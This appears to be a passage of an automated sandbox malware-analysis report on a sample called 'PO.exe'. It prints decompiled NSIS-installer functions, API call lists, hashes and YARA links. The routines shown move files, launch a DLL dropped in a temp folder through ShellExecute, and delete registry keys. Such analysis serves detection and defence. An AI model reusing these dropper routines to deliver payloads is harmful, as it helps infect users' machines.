                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                            • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                            • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                            • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                            0x00401674
                                            0x00401684
                                            0x00401688
                                            0x00401690
                                            0x004016a7
                                            0x004016af
                                            0x004016b8
                                            0x004016b8
                                            0x004016cb
                                            0x004016d7
                                            0x004026da
                                            0x004016ed
                                            0x004016f3
                                            0x004016f8
                                            0x00000000
                                            0x004016f8
                                            0x004016cd
                                            0x004016cd
                                            0x004021e8
                                            0x004021e8
                                            0x004021e8
                                            0x00402932
                                            0x0040293e

                                            APIs
                                              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,?,000000DF,000000D0), ref: 00401690
                                            • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,?,000000DF,000000D0), ref: 0040169A
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,?,000000DF,000000D0), ref: 004016AF
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,?,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll,?,000000DF,000000D0), ref: 004016B8
                                              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ), ref: 00405CA2
                                              • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                              • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                              • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
                                              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
                                              • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                              • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                              • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                              • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                              • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                              • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                              • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                            • MoveFileA.KERNEL32 ref: 004016C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll
                                            • API String ID: 2621199633-4269949907
                                            • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                            • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                            • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                            • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                            0x00404635
                                            0x00404642
                                            0x00404648
                                            0x00404686
                                            0x00404686
                                            0x00404695
                                            0x0040469c
                                            0x00000000
                                            0x0040469e
                                            0x0040464a
                                            0x00404659
                                            0x00404661
                                            0x00404664
                                            0x00404676
                                            0x0040467c
                                            0x00404683
                                            0x00000000
                                            0x00404683
                                            0x00000000

                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                            • GetMessagePos.USER32 ref: 0040464A
                                            • ScreenToClient.USER32 ref: 00404664
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                            • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                            • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                            • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x378a6
					_t7 =  *0x79d938; // 0x378aa
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                            0x00402bb7
                                            0x00402bbf
                                            0x00402bcb
                                            0x00402bd4
                                            0x00402bd7
                                            0x00402bd7
                                            0x00402bdf
                                            0x00402be1
                                            0x00402be7
                                            0x00402bee
                                            0x00402bf0
                                            0x00402bf0
                                            0x00402c09
                                            0x00402c14
                                            0x00402c21
                                            0x00402c29
                                            0x00402c29
                                            0x00402c34

                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                            • MulDiv.KERNEL32(000378A6,00000064,000378AA), ref: 00402BF6
                                            • wsprintfA.USER32 ref: 00402C09
                                            • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                            • SetDlgItemTextA.USER32 ref: 00402C21
                                            • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: TextWindow$ItemShowTimerwsprintf
                                            • String ID:
                                            • API String ID: 559026099-0
                                            • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                            • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                            • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                            • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\alfons\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                            0x00401e3c
                                            0x00401e45
                                            0x00401e47
                                            0x00401e4c
                                            0x00401e4d
                                            0x00401e58
                                            0x00401e5a
                                            0x00401e65
                                            0x00401e71
                                            0x00401e7f
                                            0x00401e91
                                            0x004026da
                                            0x004026da
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • wsprintfA.USER32 ref: 00401E5A
                                            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll, xrefs: 00401E53
                                            • %s %s, xrefs: 00401E4E
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExecuteShellwsprintf
                                            • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll
                                            • API String ID: 2956387742-2879642417
                                            • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                            • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                            • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                            • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                            0x00402af5
                                            0x00402afd
                                            0x00402b25
                                            0x00402b0f
                                            0x00402b56
                                            0x00000000
                                            0x00402b5e
                                            0x00402b23
                                            0x00000000
                                            0x00000000
                                            0x00402b23
                                            0x00402b3a
                                            0x00000000
                                            0x00402b46
                                            0x00402b50

                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                            • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                            • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                            • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                            • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                            • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                            0x00401d3e
                                            0x00401d45
                                            0x00401d74
                                            0x00401d7c
                                            0x00401d83
                                            0x00401d83
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • GetDlgItem.USER32 ref: 00401D38
                                            • GetClientRect.USER32 ref: 00401D45
                                            • LoadImageA.USER32 ref: 00401D66
                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                            • DeleteObject.GDI32(00000000), ref: 00401D83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                            • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                            • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                            • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 35%
                                            			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}













                                            0x0040454d
                                            0x00404551
                                            0x00404559
                                            0x0040455c
                                            0x0040455d
                                            0x0040455f
                                            0x00404561
                                            0x00404564
                                            0x00404564
                                            0x0040456b
                                            0x00404571
                                            0x00404571
                                            0x00404578
                                            0x00404583
                                            0x00404584
                                            0x00404587
                                            0x00404587
                                            0x00404594
                                            0x0040459f
                                            0x004045a2
                                            0x004045b4
                                            0x004045bb
                                            0x004045bc
                                            0x004045cb
                                            0x004045db
                                            0x004045f7

                                            APIs
                                            • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                            • wsprintfA.USER32 ref: 004045DB
                                            • SetDlgItemTextA.USER32 ref: 004045EE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                            • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                            • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                            • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 54%
                                            			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                            0x00401c19
                                            0x00401c22
                                            0x00401c2e
                                            0x00401c31
                                            0x00401c3b
                                            0x00401c3b
                                            0x00401c3e
                                            0x00401c42
                                            0x00401c4c
                                            0x00401c4c
                                            0x00401c4f
                                            0x00401c53
                                            0x00401c55
                                            0x00401ca2
                                            0x00401ca4
                                            0x00401cad
                                            0x00401cb5
                                            0x00401cb8
                                            0x00401cb8
                                            0x00401cc1
                                            0x00000000
                                            0x00401c57
                                            0x00401c5e
                                            0x00401c60
